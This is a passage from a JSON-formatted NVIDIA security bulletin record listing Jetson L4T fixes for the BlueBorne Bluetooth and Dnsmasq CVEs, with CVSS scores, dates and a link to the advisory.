CVSS:3.0/[AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N/E:P/RL:O/RC:C>)\n\n#### CVE-2017-1000251 and CVE-2017-1000250\n\nJetson L4T has addressed Linux vulnerabilities that have been referred to as \u201cBlueBorne.\u201d For more information about these issues, visit the Ubuntu\u00ae website.\n\n#### CVE-2017-14491, CVE-2017-14492, CVE-2017-14493, CVE-2017-14494, CVE-2017-14495 and CVE-2017-14496\n\nJetson L4T has addressed several Linux vulnerabilities in Dnsmasq. For more information about these issues visit the Ubuntu\u00ae website.\n\n_NVIDIA\u2019s risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk of your specific configuration. NVIDIA doesn\u2019t know of any exploits to these issues at this time._\n", "modified": "2017-10-25T20:37:00", "published": "2017-10-16T00:00:00", "id": "NVIDIA:4561", "href": "http://nvidia.custhelp.com/app/answers/detail/a_id/4561", "type": "nvidia", "title": "Security Bulletin: NVIDIA Tegra Jetson L4T contains multiple vulnerabilities; updates for \u201cBlueBorne\u201d and \u201cDnsmasq\u201d.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}